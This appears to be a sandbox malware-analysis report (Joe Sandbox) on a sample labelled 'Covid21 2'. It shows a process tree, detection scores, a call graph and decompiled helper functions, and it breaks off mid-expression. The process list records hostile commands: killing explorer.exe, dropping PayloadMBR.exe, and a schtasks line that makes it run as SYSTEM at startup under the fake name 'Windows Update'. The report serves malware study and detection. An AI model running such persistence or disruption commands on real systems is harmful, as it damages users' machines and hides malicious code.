                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:43
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:43
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe
                                Wow64 process (32bit):true
                                Commandline:icons.exe
                                Imagebase:0x400000
                                File size:107828 bytes
                                MD5 hash:3CA1D5768C2944D4284B1541653823C7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 13%, ReversingLabs

                                General

                                Start time:15:53:44
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:44
                                Start date:28/03/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff724c50000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:49
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe
                                Wow64 process (32bit):true
                                Commandline:screenscrew.exe
                                Imagebase:0x400000
                                File size:113664 bytes
                                MD5 hash:E87A04C270F98BB6B5677CC789D1AD1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Antivirus matches:
                                • Detection: 36%, Metadefender
                                • Detection: 62%, ReversingLabs

                                General

                                Start time:15:53:49
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:50
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:55
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\t.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:53:56
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 3 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:54:00
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\taskkill.exe
                                Wow64 process (32bit):true
                                Commandline:taskkill /f /im explorer.exe
                                Imagebase:0x8c0000
                                File size:74752 bytes
                                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:54:01
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe
                                Wow64 process (32bit):true
                                Commandline:PayloadMBR.exe
                                Imagebase:0x400000
                                File size:103424 bytes
                                MD5 hash:D917AF256A1D20B4EAC477CDB189367B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 82%, ReversingLabs

                                General

                                Start time:15:54:01
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks.exe /Create /TN 'Windows Update' /ru SYSTEM /SC ONSTART /TR 'C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe'
                                Imagebase:0x3f0000
                                File size:185856 bytes
                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:15:54:01
                                Start date:28/03/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff724c50000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Disassembly

                                Code Analysis

                                  Execution Graph

                                  Execution Coverage:4.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:5.1%
                                  Total number of Nodes:792
                                  Total number of Limit Nodes:3

                                  Graph

calls 13076->13077 13078 404b24 sprintf 13077->13078 13080 404b55 13078->13080 13081 404b5c memset RegisterClassA 13078->13081 13080->13081 13082 404bb6 AdjustWindowRect 13081->13082 13084 404c25 13082->13084 13085 404c73 13084->13085 13086 404c3c GetSystemMetrics 13084->13086 13089 404cc9 CreateWindowExA 13085->13089 13092 404c89 GetWindowRect 13085->13092 13093 404c7f GetActiveWindow 13085->13093 13087 404c49 13086->13087 13088 404c4c GetSystemMetrics 13086->13088 13087->13088 13097 404c63 13088->13097 13090 404d01 SetPropA 13089->13090 13091 404dbc UnregisterClassA 13089->13091 13095 404d17 ShowWindow 13090->13095 13096 404d39 RtlAllocateHeap CreateAcceleratorTableA 13090->13096 13094 4066bb 2 API calls 13091->13094 13092->13097 13093->13089 13093->13092 13098 40153f 13094->13098 13095->13096 13096->13098 13099 404daa 13096->13099 13097->13089 13098->12824 13102 407ee3 13099->13102 13103 407ef6 13102->13103 13104 407f15 sprintf 13103->13104 13105 407f39 GetPropA 13104->13105 13106 407f5d GetPropA 13104->13106 13105->13106 13107 407f6c 13106->13107 13108 407f9e 13106->13108 13109 407f81 13107->13109 13110 407f73 HeapFree 13107->13110 13111 407fc5 13108->13111 13112 407fa9 RtlAllocateHeap 13108->13112 13110->13109 13113 407fc8 RtlAllocateHeap SetPropA SetWindowLongA 13111->13113 13112->13113 13115 4041e0 13114->13115 13116 4041f0 memset 13115->13116 13117 404243 CreateWindowExA 13115->13117 13116->13117 13119 404291 13117->13119 13123 401563 13117->13123 13120 40662c 2 API calls 13119->13120 13121 40429f 13120->13121 13124 4047bb 13121->13124 13123->12827 13125 4047cd 13124->13125 13126 4047dc SetWindowLongA SetWindowLongA SetPropA SendMessageA 13125->13126 13127 40482d 13126->13127 13127->13123 13129 404502 13128->13129 13130 404514 memset 13129->13130 13131 40454b CreateWindowExA 13129->13131 13130->13131 13133 40458f 13131->13133 13137 4015ae 13131->13137 13134 40662c 2 API calls 13133->13134 13135 40459d 13134->13135 13136 4047bb 4 API calls 13135->13136 
13136->13137 13137->12840 13139 404f38 13138->13139 13140 404f69 13139->13140 13141 404f50 HeapFree 13139->13141 13142 404f5a HeapFree 13139->13142 13143 404fa3 13140->13143 13144 404f74 HeapFree 13140->13144 13141->13142 13142->13140 13145 404ff3 GetMessageA 13143->13145 13146 404fac PeekMessageA 13143->13146 13153 404f9b 13144->13153 13147 404ffd GetActiveWindow 13145->13147 13146->13147 13148 404fbe 13146->13148 13156 405d3c GetKeyState 13147->13156 13149 404fca MsgWaitForMultipleObjects 13148->13149 13148->13153 13151 404fe2 PeekMessageA 13149->13151 13149->13153 13151->13147 13151->13153 13152 40500b 13154 40501f TranslateMessage DispatchMessageA 13152->13154 13155 40500f TranslateAccelerator 13152->13155 13153->12476 13154->13153 13155->13153 13155->13154 13157 405d50 GetKeyState 13156->13157 13158 405daa GetPropA 13156->13158 13157->13158 13159 405d58 GetKeyState 13157->13159 13162 405dbc 13158->13162 13159->13158 13160 405d60 GetKeyState 13159->13160 13160->13158 13161 405d68 GetFocus GetClassNameA _strncoll 13160->13161 13161->13158 13163 405d94 GetFocus SendMessageA 13161->13163 13162->13152 13163->13158 13163->13162 13165 4073c0 13164->13165 13166 407455 memset 13165->13166 13166->12864 13168 403115 HeapFree 13167->13168 13169 401d90 13167->13169 13168->13169 13169->12873 13171 4024c8 13170->13171 13171->13171 13172 403100 2 API calls 13171->13172 13173 4024e1 13172->13173 13174 403110 HeapFree 13173->13174 13175 4024f9 13174->13175 13176 4030a0 RtlAllocateHeap 13175->13176 13177 402508 13176->13177 13178 403110 HeapFree 13177->13178 13179 402520 13178->13179 13180 4030a0 RtlAllocateHeap 13179->13180 13181 40252f 13180->13181 13182 407550 HeapFree 13181->13182 13183 40275c 13182->13183 13184 403110 HeapFree 13183->13184 13185 402766 13184->13185 13186 403110 HeapFree 13185->13186 13187 401dfd 13186->13187 13187->12885 13189 403ec8 13188->13189 13190 403eeb 13188->13190 13191 403ed1 RtlReAllocateHeap 13189->13191 13192 403ee3 13189->13192 13190->12900 
13191->12900 13193 403dc0 RtlAllocateHeap 13192->13193 13194 403ee8 13193->13194 13194->12900 13196 40662c 2 API calls 13195->13196 13197 406077 13196->13197 13198 40609a 13197->13198 13199 40607e CreateFileA 13197->13199 13201 4060bc 13198->13201 13202 40609f CreateFileA 13198->13202 13200 4060f9 13199->13200 13203 406149 13200->13203 13206 406106 RtlAllocateHeap 13200->13206 13201->13200 13204 4060c1 CreateFileA 13201->13204 13202->13200 13207 40615c 13203->13207 13209 4066bb 2 API calls 13203->13209 13204->13200 13205 4060e3 CreateFileA 13204->13205 13205->13200 13208 40613b 13206->13208 13207->12930 13208->12930 13209->13207

                                  Executed Functions

                                  Control-flow Graph

                                  C-Code - Quality: 82%
                                  			E00405EB2(void* __eflags, intOrPtr _a4) {
                                  				CHAR* _t3;
                                  				void* _t6;
                                  				_Unknown_base(*)()* _t7;
                                  				long _t9;
                                  				long _t10;
                                  				CHAR* _t11;
                                  				struct HINSTANCE__* _t14;
                                  
                                  				_t3 = E00407750(0x104, _a4); // executed
                                  				_t11 = _t3;
                                  				_t10 = GetTempPathA(0x104, _t11);
                                  				_t14 = LoadLibraryA("Kernel32.DLL");
                                  				if(_t14 != 0) {
                                  					_t7 = GetProcAddress(_t14, "GetLongPathNameA");
                                  					if(_t7 != 0) {
                                  						_t9 =  *_t7(_t11, _t11, 0x104); // executed
                                  						_t10 = _t9;
                                  					}
                                  					FreeLibrary(_t14);
                                  				}
                                  				_t6 = E004077F0(0x104 - _t10);
                                  				_t11[_t10] = 0;
                                  				return _t6;
                                  			}











                                  APIs
                                    • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(029A0000,00000001,029A06F0,000040FF), ref: 00407797
                                  • GetTempPathA.KERNEL32(00000104,00000000,00000104,004013CA,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                  • LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA,OPS,00000000), ref: 00405ED6
                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                  • GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA), ref: 00405EF5
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA,OPS,00000000), ref: 00405EFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTemp
                                  • String ID: GetLongPathNameA$Kernel32.DLL
                                  • API String ID: 752937943-822094646
                                  • Opcode ID: a669cfd6c78251049e6fa13bc80549985cfc2c20c01295e95ea53c2998d511aa
                                  • Instruction ID: 2fdf95b4f3bb88d5f25b72bcecc505d16b40b69b5bc7ba3a5d03bddc1f48918c
                                  • Opcode Fuzzy Hash: a669cfd6c78251049e6fa13bc80549985cfc2c20c01295e95ea53c2998d511aa
                                  • Instruction Fuzzy Hash: A5F0BE322012146BC32127B5AD4CF6B3A6CDB82791B04003AFA04B3282CABD9C1182BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00406960() {
                                  				CHAR* _t32;
                                  				void* _t35;
                                  				void* _t36;
                                  				void* _t40;
                                  				signed char* _t42;
                                  				signed char* _t43;
                                  				signed char* _t44;
                                  				signed char* _t45;
                                  				signed char* _t46;
                                  				signed char* _t47;
                                  				void* _t50;
                                  				signed int _t94;
                                  				unsigned int _t97;
                                  				void* _t98;
                                  				unsigned int _t100;
                                  				signed int _t102;
                                  				signed int _t103;
                                  				void* _t106;
                                  				unsigned int _t109;
                                  				void* _t110;
                                  
                                  				_t32 =  *(_t110 + 4);
                                  				_t103 = _t102 | 0xffffffff;
                                  				if(_t32 != 0) {
                                  					_t35 = CreateFileA(_t32, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                  					_t50 = _t35;
                                  					 *(_t110 + 8) = _t50;
                                  					if(_t50 != 0xffffffff) {
                                  						_t36 =  *0x40b13c; // 0x27d0000
                                  						_t106 = RtlAllocateHeap(_t36, 0, 0x1000);
                                  						 *(_t110 + 0x10) = _t106;
                                  						if(_t106 != 0) {
                                  							do {
                                  								ReadFile(_t50, _t106, 0x1000, _t110 + 0x20, 0); // executed
                                  								_t97 =  *(_t110 + 0x1c);
                                  								_t40 = _t106;
                                  								_t100 = _t97;
                                  								if(_t97 >= 8) {
                                  									_t109 = _t97 >> 3;
                                  									do {
                                  										_t42 = _t40 + 1;
                                  										_t43 =  &(_t42[1]);
                                  										_t44 =  &(_t43[1]);
                                  										_t45 =  &(_t44[1]);
                                  										_t46 =  &(_t45[1]);
                                  										_t47 =  &(_t46[1]);
                                  										_t94 = ((((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 
+ (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t45[1] & 0x000000ff ^ ((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 
4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t46[1] & 0x000000ff ^ (((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 
0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t45[1] & 0x000000ff ^ ((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + 
(( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ 